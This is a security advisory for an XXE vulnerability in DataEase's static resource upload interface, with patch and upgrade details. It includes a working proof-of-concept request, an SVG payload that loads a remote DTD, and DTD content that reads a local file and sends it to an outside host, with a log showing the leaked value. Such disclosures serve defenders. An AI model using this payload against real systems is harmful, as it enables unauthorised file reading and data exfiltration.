GHSA-4m9p-7xg6-f4mm

### Impact
There is an XML external entity injection vulnerability in the static resource upload interface of DataEase. An attacker can construct a payload to implement intranet detection and file reading.

1. send request:
```
POST /de2api/staticResource/upload/1 HTTP/1.1
Host: dataease.ubuntu20.vm
Content-Length: 348
Accept: application/json, text/plain, */*
out_auth_platform: default
X-DE-TOKEN: jwt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6OZBNygiUCAZEbMn

------WebKitFormBoundary6OZBNygiUCAZEbMn
Content-Disposition: form-data; name="file"; filename="1.svg"
Content-Type: a

<?xml version='1.0'?>
<!DOCTYPE xxe [
<!ENTITY % EvilDTD SYSTEM 'http://10.168.174.1:8000/1.dtd'>
%EvilDTD;
%LoadOOBEnt;
%OOB;
]>
------WebKitFormBoundary6OZBNygiUCAZEbMn--

// 1.dtd的内容
<!ENTITY % resource SYSTEM "file:///etc/alpine-release">
<!ENTITY % LoadOOBEnt "<!ENTITY &#x25; OOB SYSTEM 'http://10.168.174.1:8000/?content=%resource;'>">
```

2. After sending the request, the content of the file /etc/alpine-release is successfully read
```
::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] "GET /1.dtd HTTP/1.1" 200 -
::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] "GET /?content=3.20.0 HTTP/1.1" 200 -
```

Affected versions: <= 2.10.0

### Patches
The vulnerability has been fixed in v2.10.1.

### Workarounds
It is recommended to upgrade the version to v2.10.1.

### References
If you have any questions or comments about this advisory:

Open an issue in https://github.com/dataease/dataease
Email us at [[email protected]](mailto:[email protected])